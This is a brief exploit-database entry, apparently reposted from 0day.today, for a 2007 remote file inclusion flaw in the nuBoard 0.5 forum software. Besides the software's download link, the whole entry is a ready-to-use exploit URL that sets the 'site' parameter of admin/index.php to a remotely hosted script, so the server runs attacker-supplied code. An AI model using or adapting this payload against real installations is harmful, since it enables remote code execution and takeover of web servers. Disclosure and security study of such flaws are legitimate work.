id: 2271
date: 11/04/2007
title: nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability
author: GoLd_M
cves: 

================================================================
nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability
================================================================



nuBoard 0.5 (index.php site) Remote File Inclusion Vulnerability
 http://switch.dl.sourceforge.net/sourceforge/nuboard/nuboard_v0.5.tar.gz
 /nuboard_v0.5/admin/index.php?site=http://localhost/scripts/020.txt?



#  0day.today [2023-03-24]  #